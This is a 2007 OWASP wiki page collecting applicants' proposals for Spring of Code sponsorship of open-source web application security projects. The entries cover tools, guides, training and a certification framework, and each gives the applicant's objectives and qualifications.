I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...
I'm also member of the OWASP Belgium board that started in March 2007.

== Erwin Geirnaert - OWASP WebGoat Solutions Guide ==

* '''Executive Summary''':
WebGoat is used by a lot of people to learn about web application security and the different vulnerabilities. But it takes a lot of time to grasp how the tools like WebScarab work and how to use them effectively in WebGoat. I propose to create a walkthrough of the lessons in WebGoat so that people can learn from the solutions, without spoiling the fun.

* '''Objectives and Deliverables''':
The WebGoat Solutions Guide is a document that can be bundled with WebGoat. Each lesson contains a detailed solution with screenshots and tools. I created a PDF with the solution for WebGoat 4.0 but this is too big to load (15 MB) and is not very practical.

After a discussion with Bruce about this, we think that the solutions should be made like the existing Lessons Plan so it is easier to maintain and update when a lesson changes. This means that there will be documentation folder and an individual solution for each lesson.

* '''Why you should be sponsored for the project''':
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...
I'm also member of the OWASP Belgium board that started in March 2007.

== Bunyamin Demir – OWASP WeBekci Project ==

==== Executive Summary: ====

Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity [http://www.modsecurity.org/] is an open source web application firewall that runs as an Apache module. It is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel.

I decided to provide this essential tool with a control panel which I believe will ease and thus encourage its usage.

ModSecurity allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure. My main goal is to analyze attacks and generate rules to change the configuration of the ModSecurity accordingly.

ModSecurity has a feature called “flexible rule engine” as its heart of Attack Prevention capability . It uses ModSecurity’s “Rule Language,” (a programming language designed to work with HTTP transaction data). It is easy to use and flexible; yet the system administrators need to learn its own rules to create what is called “Certified ModSecurity Rules” to be implemented. My control panel will automate the major code-generation in Rule Language.

==== Objectives and Deliverables: ====

* '''Configuration''' : Will add all configuration parameter
* '''Rule Generator''': Will write all the Rules in Rule Language
* '''Logging''' : Auditlog and debuglog will be added.
* '''Multiple-DB''' : Will add PostgreSql and Sqlite support.

==== Why I should be sponsored for the project: ====

I am involved with OWASP Turkey [http://www.owasp.org/index.php/Turkey] and interested very much in WAF. Even though this is my first project for OWASP, I am very much interested in every aspect of ModSecurity. With SpoC007’s support I will finalize my work on OWASP WeBekci [http://www.owasp.org/index.php/Category:OWASP_WeBekci_Project].

== Eric Sheridan and Dr. Goran Trajkovski - The Scholastic Application Security Assessment Project ==

=== ABSTRACT ===

One of the major goals of the Open Web Application Security Project is to educate developers in the field of application software security. Understanding the risks and threats associated with web application software is pivotal in building a mature application security process. While OWASP has made a significant impact in the professional industry, more time and energy should be focused towards the academic community. It is an unfortunate fact that most universities do not require a stringent software security course for their computer science students. Consequently, most young developers do not have the ability to assess and mitigate the risks and threats for their own applications. It is for this reason that we believe the Open Web Application Security Project should fund an initiative to encourage the adaptation of application software security methodologies in the academic course curriculum.

The Scholastic Application Security Project is intended to be the first step towards integrating security requirements in academic course curriculums. The primary goal of the project is to give students hands-on experience performing application security assessments using the tools and documentation found at http:///www.owasp.org. The assessment, lead by an application security professional, will demonstrate to students how the information and tools found at OWASP can be used to assess and ultimately increase the overall security posture of a web application.

This project contributes towards bridging the gap between academia and industry, by equipping students with hands-on ready-for-the-job-market skills in the application software securing industry.

=== PARTICIPANTS ===

The Scholastic Application Security Assessment Project requires that college level students, lead by an application security professional, perform a security audit on an open source web application using the tools and information available at OWASP.

::*'''Application Security Professional''' – Eric Sheridan ([http://www.aspectsecurity.com Aspect Security])
::*'''Towson University (TU) Partner''' – Dr. Goran Trajkovski, Towson University (http://www.towson.edu)
::*'''Students''' – Students of TU’s Application Software Security Course (COSC 458), nominated by the TU Partner
::*'''Web Application''' – The Open WebMail Project (http://openwebmail.org/)

=== OWASP UTILIZATION ===

The Scholastic Application Security Assessment Project requires heavy utilization of existing OWASP tools and utilities. Through this requirement, the project will illustrate the fact that existing OWASP resources can be used and heavily relied upon in a professional security audit. The following is a list of notable OWASP resources whose use will be documented throughout the assessment:

::*'''OWASP Top Ten 2007''' - The security critical areas that the students will assess in the review
::*'''OWASP Testing Guide v2''' – The primary resource for building penetration testing cases
::*'''OWASP Guide''' – The primary resource for technical details pertaining to a technology and/or vulnerability
::*'''OWASP WebScarabNG''' – The primary proxy utility used throughout the assessment

=== THE FINAL REPORT ===

Students are required to follow the principle of “responsible disclosure” during the course of the security assessment. The developers of the open source application will be notified if any significant issues are found. Once the assessment is complete, a final report will be delivered to the application developers and the appropriate OWASP Spring of Code personnel. For each finding in the report, the students will be required to describe how the tools and information found at OWASP were used in the discovery.

=== HOW DOES OWASP BENEFIT? ===

The Scholastic Application Security Assessment Project is specifically designed to benefit the OWASP brand:

''The OWASP Community…''
::*will be provided a case study proving that the resources available at OWASP can be utilized in an academic environment, that can be later used in advertising the OWASP efforts to similar programs as the one at TU.
::*will be providing students a hands on experience in learning and testing for the latest web application security threats, thus potentially enlarging the OWASP community of contributors and supporters.
::*will be addressing the need to educate developers in the security critical areas.
::*will be seen as offering a professional level service to another open source project.
::*will be addressing one of the root causes of application software insecurity.

=== BACKGROUND ===

'''Eric Sheridan:'''

::*Earned a Bachelor’s of Science in Computer Science from Towson University
::*Graduate Student in Information Security at Johns Hopkins University
::*Application Security Engineer at Aspect Security
::*Lead of the OWASP Stinger Project and the OWASP Validation Project

'''Goran Trajkovski, PhD:'''

::*Has been teaching the Application Software Security course for the Computer Security undergraduate and master-level majors at TU since 2004 (TU has been a Center of Excellence in Information Assurance, designated by the NSA since 2002).
::*Assistant professor of Computer and Information Sciences at Towson University, and Director of its Cognitive Agency and Robotics Lab (CARoL).
::*Has lead curricular efforts in integrating application software security topics throughout the Computer Science and Computer Information Sciences curriculum
::*12 years of full time teaching experience in higher ed.

==Boris - OWASP Site Generator==
OWASP Site Generator is a great tool, but it could be even better and more widespread. There’s a lot room for improvements to both its functionality and user experience. The way I see it, main user needs to be addressed and specific development objectives for the next release of OWASP Site Generator would be:
===User Needs===
*Create multiple types of sites easily
*Track and analyze requests easily
*Change the look and feel of the resulting sites easily
*Create sites for multiple web backend technologies easily
*Learn how to use OWASP Site Generator easily

===Development Objectives===
*Create a vulnerability library that can be used for web services, HTML forms, AJAX, etc. instead of having to craft the same attack for each
*Add support for logging of all received requests, as well as querying resulting log files
*"Templatize" the code generation process, so it can support skinning of the resulting sites
*"Templatize" the code generation process, so it can support different backend web technologies
*Fix all significant defects in the current release of OWASP Site Generator
*Redesign the GUI to make it more efficient and user friendly
*Create a smooth setup program which would install both client and server components as effortlessly as possible
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one

===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Boris - OWASP Report Generator==
There is no doubt that OWASP Report Generator is a very handy tool for penetration testers and other security researchers, but it would be even better if some enhancements were made:
===User Needs===
*More robustness
*Ease of use (more efficient and intuitive GUI)
*Automated reporting for some typical (or not so typical) scenarios
*More documentation
*More samples

===Development Objectives===
*Redesign the GUI to make it more efficient and user friendly
*Clean up the code
*Add functionality to import, execute and create reports for OWASP Tiger automated tests
*Create some samples
*Create a smooth setup program
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one
===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Boris - OWASP Tiger==
OWASP Tiger project is at its very beginning. Some new features are needed in order for it to become more useful. Here’s a short list:
===User Needs===
*Easier editing of test projects
*Support for testing sites that require authentication
*Support for testing sites that require use of cookies
*An easy way of specifying vulnerability data, ideally an automated one
*More flexible reporting
*More project templates
*More documentation
===Development Objectives===
*Add support for cookies
*Add support for standard authentication schemes
*Add support for importing vulnerability data from a test definition (or a vulnerability library)
*Make use of OWASP Report Generator for more advanced reports
*Create a setup program that would install both client and project templates and also allow for adding new templates after the initial installation
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one
===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Heiko - Web Application Security put into practice==
I'm trying to make the OWASP Top Ten and Guide project known in the programming community, but I understand that clear examples in the specific programming language and best practices with explanation educate the best. I'm at the chair for secure software at my university and I want to contribute practical examples, because I believe not to teach secure programming is a great oversight in today's education. Not only the programmers in large companies have to be aware of security impacts, but also their future employees and their freelance programmers. I'm with a large organization of freelance programmers, which I want to make aware of security flaws.

The Ruby on Rails Security project [http://www.rorsecurity.info/] started this year and is the only security initiative for Ruby on Rails. Ruby is the fastest growing level A programming language, according to the Tiobe programming community index [http://www.tiobe.com/tpci.htm], partly because of its advertised simplicity. This is dangerous, as programmers could be enticed to do cargo cult programming [http://en.wikipedia.org/wiki/Cargo_cult_programming] without knowing the security impacts. I found several security holes in popular modules, and even the Rails framework itself generates potentially insecure code. Nevertheless, Rails provides good means against many of the OWASP Top Ten security flaws, but I believe these means have to be popularized much more.

===Objectives and Deliverables===
* Create a security guide to the most popular web server software, Apache
** Installation
** secure configuration, emphasis on Rails, but not limited to it
** file system privileges for Rails and Apache
** anti profiling techniques for Apache
** Modules and Mod_security configuration

* Create a security guide to the popular database software, MySQL, as practical contribution to the OWASP Top 10 Insecure storage section
** Installation
** secure configuration, emphasis on Rails, but not limited to it
** file system privileges for Rails and MySQL
** MySQL access restriction techniques
** encryption methods

* Ruby on Rails security guide and code examples, with at least the following topics:
** Anti profiling techniques
** Rails routes security
** error handling and presentation, as in OWASP Top 10 Improper Error Handling
** OWASP Top 10: XSS in Rails
** OWASP Top 10: SQL injection in Rails
** OWASP Top 10: Parameter injection in Rails
** OWASP Top 10: Session handling in Rails
** OWASP Top 10: Access control in Rails
** handling of files
** integrity
** encryption and SSL
** logging flaws
** Ajax security

* Code & other
** means to check the security of MySQL
** input validation guide, and implement it in Ruby
** update the poorly documented guide at http://manuals.rubyonrails.com/read/chapter/40 which is the only official guide to security
** usage guide for OWASP tools, also in connection with Rails
** make the results known in the several communities I'm in
** if applicable: submit code to Rails for security holes found

===Why I should be sponsored for the project===
I have been programming professionally for 10 years and created several software products, including Internet applications, and I always focused on security. I am currently graduating university, my thesis is about web application security. Recently, I started the Ruby on Rails security project, which is the only security project for Rails. I have always delivered my work on time, and I believe I have the knowledge to deliver good quality.

===Long-term vision for the project===
Make it available to the community and accept security notices and best practices from other users to constantly improve it.

===Benefits to the OWASP===
* practical guides on how to put security into practice: the most popular web server software Apache and the popular database software MySQL
* if applicable: additional examples and chapters for the OWASP Guide
* the first and only fully-fledged security guide to a programming language and framework which is used by many large companies
* security awareness of future employees and freelancers
* more exposure of the OWASP

==Denis – Python Tainted Mode==
I am graduate student of Moscow State University, department of Computational Mathematics and Cybernetics.
My graduate work is dedicated to web-application security. The goal of my graduate work is to combine dynamic code analysis with penetration testing to provide more precise analysis.
This work will help to find security vulnerabilities in web-applications.
I successfully presented parts of my work at university conferences.

===My Project===
The goal of my project is to create analog of Perl’s Taint Mode for Python programming language.
Taint mode is successfully used in Perl, PHP, and Ruby to find input validation vulnerabilities in web-applications (see for ex. PHPRevent[http://dependability.cs.virginia.edu/info/PHPrevent]).
Unfortunately there is no implementation of Taint Mode for Python language despite of wide spread of Python-based web-applications. Taint Mode for Python is highly claimed.
I plan to modify Python interpreter and add Taint label propagation. Then I’ll add three configuration lists:
* List of sources. All data emanating from sources must be marked tainted.
* List of critical functions, that shouldn’t receive tainted data.
* List of sanitizing functions that untaints data.
These three lists are dependent on technology that is used between web-server and web-applications in web server. In my project I plan to build such lists for mod_python and then broaden for other technologies. With switched on taint mode web-application will receive exceptions when critical function receives tainted data.

===Why should I be selected===
I have strong mathematical & computer science background. I’m familiar with research publications on dynamic analysis and with implementation of taint mode in Perl and PHP (PHPrevent Project).
This project is part of my work at university. It will be made under mentoring of my scientific advisor.
This work is already practically done that’s why I’m sure I will finish my project in time.
I have strong skills in developing projects with Python, Java, C, C++, and Assembler. Then I plan to support, develop and enhance my project and increase its quality with penetration testing.

If you have any questions or would like further information, feel free to contact me.

Yours faithfully,
Denis

== Darren Edmonds - WebScarab NG Security Test Automation ==

=== Background ===
I am a 28 year old software developer from the UK with a background in java based web development and application security testing. I have strong mathematical skills, a degree in software engineering, a SCJP qualification and 8 years of commercial development experience. I have created many web based and standalone applications delivering on time and adhering to common software practices.
I'm an avid supporter of open source software and try to use it whenever possible in a commercial environment. I've made contributions to the Geotools mapping project, written a securing tomcat article for OWASP and developed a full modification for the first person shooter Quake 3.

=== Project Details ===
Having used numerous penetration testing applications I believe there is a need for an open source application which supports some, or all, of the features of the more expensive commercial products. I propose to make WebScarab generate, record, and playback security test cases so that regression testing is possible. If time permits I would also like to include some extra automated tests that are not always feasible during manual testing; searching for backup files (~, Copy of X), checking non-authorised access to authorised areas, common and brute force name directory searching, etc. Perhaps include the ability to read the test database of other scanning tools such as nikto.
I have already made contact with Rogan Dawes, original WebScarab NG author, to discuss some initial ideas. I believe it is important that Rogan is consulted during the initial planning phase to make sure the project keeps to a set of consistent guidelines.

=== Milestones ===
* Research regression testing features in other applications
* Create a functional specification
* Build testing framework (possible inclusion of scripting language for user defined tests)
* Testing

=== Why I Should be Sponsored ===
I believe I am an ideal candidate to develop the proposed additions to WebScarab NG, not just because of my qualifications and experience, but because I plan to use WebScarab NG in my work to help perform the initial testing of web applications. As well as my own time my current employer will allocate me a set amount of time to ensure the project achieves its milestones.
The end result will make WebScarab NG a much more powerful testing tool and will be a great asset to the OWASP community. With continued development and input from the community I see no reason why WebScarab NG cannot rival commercial testing application features, usability, and business benefit. Increasing WebScarab's features will result in increased community awareness bringing in extra developers, ensuring continual development and so the cycle starts again.

== Bernardo - sqlmap ==

* '''Executive Summary'''
[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database fingerprint, to enumerate entire remote database and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

* '''Objectives and Deliverables'''
** Add support for Oracle database;
** Add support to extract database users password hash;
** Extend inband SQL injection functionality to all other possible queries;
** Add Microsoft SQL Server database fingerprint;
** Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting;
** Add support for SQL injection on HTTP 'Cookie' and 'User-Agent' headers;
** Add support for query ETA (Estimated Time of Arrival) real time calculation;
** Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions;
** Improve logging functionality.

* '''Long-term vision for the project'''
Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible.
In the long run I would also like to develop a graphical user interface.

* '''Why I should be sponsored for the project'''
I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

OWASP Spring Of Code 2007 Applications

2007-03-30T12:55:13Z

Inquis:

This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]

'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''

See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application

---------

'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:

== {Your first name or Alias} - {Project name} ==
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].

You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.

* Your educational and professional background

* Application security experience and accomplishments

* Participation and leadership in open communities

* The opportunity, challenges, issues or need your proposal addresses

* Objectives or ways in which you will meet the goal(s)

* Specific activities and who will carry out these activities

* Specific deliverables and a rough project schedule so we can track progress

* Long-term vision for the project

* Any other reasons why you and your project should be selected

== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==

I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of
information systems security since 1994, when BBSes and Linux still lived together.

A quick search for buanzo on google [http://www.google.com/search?hl=en&q=buanzo&btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].

In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].

=== Accomplishments ===

I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing
an Internet Draft to be proposed for RFC regarding Enigform.

=== Community ===

I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].

=== My Project ===

Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].

Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.

Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].

=== Long Term ===

Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers
and/or programming languages, and also provide OpenPGP De/Encryption support.

=== Why should I be selected ===

I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the
international security community, and I firmly believe Enigform is my greatest idea so far.

== Eoin Keary - Code review Project ==
* '''Executive Summary''':
I am proposing that I complete the OWASP Code review guide during this period.
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners.

I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.

There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.

The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.
Code review methodologies also need to be discussed.

* '''Objectives and Deliverables''':

Update of the code review guide:
* Add additional areas relating to the code review process such as:
** Benefits and pitfalls
** Methodology
** The code review process
*** Transactional analysis
*** Managing the code review process
*** Assigning risk to findings

** Technical guides
*** Language specific best practice
*** Java
*** .NET
*** PHP
*** MySQL
*** Stored Procs
*** C/C++

** Code review by vulnerability:
*** Reviewing Code for Buffer Overruns and Overflows
*** Reviewing Code for OS Injection
*** Reviewing Code for SQL Injection
*** Reviewing Code for Data Validation
*** Reviewing code for XSS issues
*** Reviewing Code for Error Handling
*** Reviewing Code for Logging Issues
*** Reviewing The Secure Code Environment
*** Reviewing code for Authorization Issues
*** Reviewing code for Authentication Issues
*** Reviewing code for Session Integrity
*** Reviewing code for Cross Site Request Forgery
*** Reviewing code for Cryptography implementation issues
*** Reviewing code Dangerous HTTP Methods (Deployment)
*** Race Conditions

The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.

* '''Why I should be sponsored for the project''':

I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process.
I also was the lead of the Testing guide until V2 was published via the Autumn of Code.

I have always delivered any work I have volunteered for on time.

I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.

== Paolo Perego - Owasp Orizon Project ==
* '''Executive Summary''':
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.

I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.

Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.

I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.

* '''Objectives and Deliverables''':
Completing the static code review API section
* improving programming language to XML translator
* improving security best practices code review scan library
* improving secure coding fashion best practices library
* writing the pattern matching scan using the aformentioned libraries
Writing the java source code enforment objects
* writing an object to handle form data values to avoid XSS
* writing an object to handle form data values to avoid SQL Injection
* writing an object to handle HttpRequest and HttpSession objects

* '''Why I should be sponsored for the project''':
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.

I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.
I'm a developer too so I understand also the "dark side" of the problem developing code with security in mind.

I work using the "release early release often" paradigm so to be concrete and let other people having something usable to work with.

== Sebastien Deleersnyder - OWASP Education Project ==
* '''Executive Summary''':
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences.

Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience.

* '''Objectives and Deliverables''':
Currently the project goals are to create Educational Tracks:
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past
* A "Web Application Security Primer" Track for beginners (4 hours)
* A "What developers should know on Web Application Security" Track for developers (4 hours)

* '''Why you should be sponsored for the project''':
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.

This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.

If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.

* '''More details''':
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.

== Subere - OWASP JBroFuzz Project ==

==== Overview ====

JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.

==== Fuzzing ====

As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.

==== Objectives ====

JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):

* '''Open Source Tab'''
* '''NTLM Brute Force over HTTP/S Tab'''
* '''Pure HTTP/S Fuzzing using HTTPClient'''
* '''Blind SQL Injection Fuzzing Tab'''

At the same time, the following existing tabs need to be updated and made more robust (details in next section):

* '''TCP Fuzzing tab allowing graph outputs'''
* '''TCP Sniffing tab update thread Agent Queue'''
* '''Update Generators file format'''
* '''Include SOAP and XML fuzzing'''

This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.

==== Deliverables ====

Based on the above, the new code elements that will be added are as follows:

* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''

For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail:

* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''

Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.

==== Background ====

In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months.

Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.

I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.

==== Why should JBroFuzz be sponsored? ====

Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.

Keep the code platform independent adds a huge advantage.

Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.

== Joshua Perrymon - OWASP LiveCD Project ==
* '''Executive Summary''':
I am proposing that I complete the second version of the OWASP LiveCD during this period.
The first version of the LiveCD is now available and include many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security proffesionals to perform application testing and training.

In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This shouls start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also inlcude the wiki and ALL the tools developed for OWASP.

* '''Objectives and Deliverables''':

Update of the LiveCD:
* Complete OWASP branding
* Add OWASP wiki
* Add encryption capabilities
* Add more OWASP tools
* Add more pen-test tools such as;
VOIP, RFID, BlueTooth, Wireless, etc..

* '''Why I should be sponsored for the project''':

I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP liveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis. Not once a year like other liveCDs. The CD will also include specialty tools and documentation to perform VOIP, RFID,Bluetooth, and wireless security assessments.

----

== Mark Curphey – The OWASP Web Security Certification Framework ==

'''Problem'''

PCI DSS is attracting a lot of criticism for a lot of valid reasons.

http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/

http://blogs.csoonline.com/node/210

http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html

The list is of course long and not appropriate here……and while its easy to knock PCI, there is nothing better out there.

'''Solution and Deliverables'''

As opposed to me continuing saying what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to simply create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. We won't get bogged down in the politics up-front, but hold something good up to the world for people to adopt. This project would of course draw on and bring together many of the other OWASP Projects including the Guide (What is a secure web app), Testing Guides (How to test for a secure web app), WebGoat (part of how to certify an individual understands and can find web app issues) etc. Many of those projects may not be complete or a perfect fit today, but this project can bring a common connecting theme to a lot of very valuable IP that OWASP has built over the years. I will also create it in such as way that a corporate could adopt/adapt it themseles as well as an industry. Where other OWASP projects are not complete or currently suitable I will build a requirements doc that can be considered by those teams if they feel appropriate.

This project would address the;

'''Standard'''
*A complete auditable (important) web site security standard suitable for modern e-commerce companies including
**The technical things people should care about
**The operational / management things people should care about
'''Certification Model'''
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc). This will include for example the model for certifying auditors (including the actual test program); checklists and forms for auditors to complete and other supporting material.

Essentially its a complete blueprint for an organisation like OWASP or a regulatory body need to run a web site security certification program complete with the supporting material to implement it.

